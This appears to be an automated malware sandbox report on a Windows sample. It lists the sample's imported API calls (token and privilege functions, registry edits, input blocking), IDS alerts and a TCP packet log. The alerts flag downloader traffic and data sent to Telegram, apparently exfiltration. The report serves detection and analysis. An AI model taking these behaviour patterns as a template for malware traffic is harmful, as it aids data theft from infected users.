IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishGreat Britain

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-11T01:27:42.543737+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.6.16880TCP
                                                                                                                  2025-01-11T01:27:43.449972+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.6.16880TCP
                                                                                                                  2025-01-11T01:27:44.030882+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706104.21.80.1443TCP
                                                                                                                  2025-01-11T01:27:44.715728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                                                                  2025-01-11T01:27:52.052474+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549730104.21.80.1443TCP
                                                                                                                  2025-01-11T01:27:54.453173+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549749149.154.167.220443TCP
                                                                                                                  2025-01-11T01:27:57.856250+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555408193.122.6.16880TCP
                                                                                                                  2025-01-11T01:27:58.731232+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555408193.122.6.16880TCP
                                                                                                                  2025-01-11T01:27:59.327823+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.555420104.21.80.1443TCP
                                                                                                                  2025-01-11T01:28:00.045467+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555426193.122.6.16880TCP
                                                                                                                  2025-01-11T01:28:00.629747+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.555431104.21.80.1443TCP
                                                                                                                  2025-01-11T01:28:00.809278+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.555432149.154.167.220443TCP
                                                                                                                  2025-01-11T01:28:01.328649+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555438193.122.6.16880TCP
                                                                                                                  2025-01-11T01:28:02.637495+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555446193.122.6.16880TCP
                                                                                                                  2025-01-11T01:28:09.331890+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.555499149.154.167.220443TCP
                                                                                                                  2025-01-11T01:28:15.302844+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.555539149.154.167.220443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 11, 2025 01:27:41.639647961 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:41.644618988 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:41.644737959 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:41.645015001 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:41.649780035 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.292053938 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.297210932 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:42.302716017 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.488945961 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.542716980 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:42.542776108 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.542859077 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:42.543736935 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:42.549335003 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:42.549376011 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.009730101 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.010073900 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.015486002 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.015508890 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.015846014 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.059490919 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.070092916 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.111341000 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.202174902 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.202243090 CET44349705104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.202302933 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.208604097 CET49705443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.211663008 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:43.216614008 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.401844025 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.404824972 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.404874086 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.404944897 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.405293941 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.405311108 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.449971914 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:43.885624886 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:43.888077021 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:43.888111115 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.030904055 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.030992031 CET44349706104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.031040907 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:44.031500101 CET49706443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:44.035041094 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:44.036283970 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:44.040117025 CET8049704193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.040179014 CET4970480192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:44.041105986 CET8049707193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.041234970 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:44.041424036 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:44.046257973 CET8049707193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.668097973 CET8049707193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.669581890 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:44.669636965 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.669739962 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:44.670000076 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:44.670015097 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:44.715728045 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:45.170454025 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:45.173527956 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:45.173577070 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:45.304063082 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:45.304131031 CET44349708104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:45.304186106 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:45.313810110 CET49708443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:45.481336117 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:45.486346960 CET8049709193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:45.486435890 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:45.486644030 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:45.494689941 CET8049709193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.146157980 CET8049709193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.147474051 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.147537947 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.147618055 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.147855997 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.147875071 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.199989080 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.605089903 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.606766939 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.606803894 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.761888027 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.761956930 CET44349710104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.762021065 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.762770891 CET49710443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:46.766015053 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.766978025 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.771120071 CET8049709193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.771220922 CET4970980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.771832943 CET8049711193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:46.772015095 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.772192001 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:46.777020931 CET8049711193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:47.427202940 CET8049711193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:47.428492069 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:47.428565979 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:47.428643942 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:47.428880930 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:47.428894997 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:47.481312990 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:47.901679993 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:47.931583881 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:47.931638002 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.042716980 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.042788982 CET44349712104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.042844057 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:48.050033092 CET49712443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:48.073968887 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:48.075295925 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:48.080195904 CET8049713193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.080271959 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:48.080365896 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:48.083548069 CET8049711193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.083606958 CET4971180192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:48.085150957 CET8049713193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.744534969 CET8049713193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.745994091 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:48.746048927 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.746135950 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:48.746465921 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:48.746480942 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:48.793946028 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.208023071 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.213571072 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:49.213610888 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.364829063 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.365323067 CET44349714104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.365396023 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:49.365888119 CET49714443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:49.369378090 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.370624065 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.374455929 CET8049713193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.374535084 CET4971380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.375472069 CET8049716193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:49.375582933 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.375657082 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:49.380475998 CET8049716193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.033744097 CET8049716193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.035156012 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.035212994 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.035279036 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.035547972 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.035562038 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.075000048 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.508681059 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.559976101 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.654230118 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.654256105 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.774313927 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.774451971 CET44349717104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.774494886 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.774812937 CET49717443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:50.777589083 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.778569937 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.782715082 CET8049716193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.782764912 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.783433914 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.783489943 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.783591986 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.788309097 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.420068979 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.421521902 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.421576977 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.421644926 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.422096014 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.422115088 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.465610981 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:51.903615952 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.905245066 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.905282021 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052480936 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052545071 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052788019 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.053277016 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.058559895 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.063667059 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.063750029 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.070055008 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.074954987 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.075074911 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.076690912 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.081496954 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.705743074 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.707067966 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707187891 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.707292080 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707648039 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707680941 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.746857882 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.161350965 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.215647936 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.439909935 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.439945936 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568624973 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568692923 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568902969 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.569235086 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.588011026 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.592724085 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.592757940 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.592817068 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.592926979 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.593312025 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.593323946 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.596005917 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.972910881 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:53.977742910 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.978173018 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:53.983129025 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.210448027 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.210529089 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.213495970 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.213500977 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.213836908 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.215225935 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.259322882 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.427944899 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:54.432825089 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.432868004 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:54.453206062 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.453284979 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.456027031 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.469811916 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:56.944425106 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.949266911 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:56.952271938 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.952271938 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.957027912 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.622175932 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.625521898 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:57.630280018 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.811250925 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.845560074 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.845597982 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.846101999 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.850104094 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.850119114 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.856250048 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:58.325192928 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.325264931 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.326755047 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.326761961 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.327040911 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.371855974 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.378186941 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.419331074 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493010044 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493065119 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493406057 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.495877981 CET55414443192.168.2.5104.21.80.1
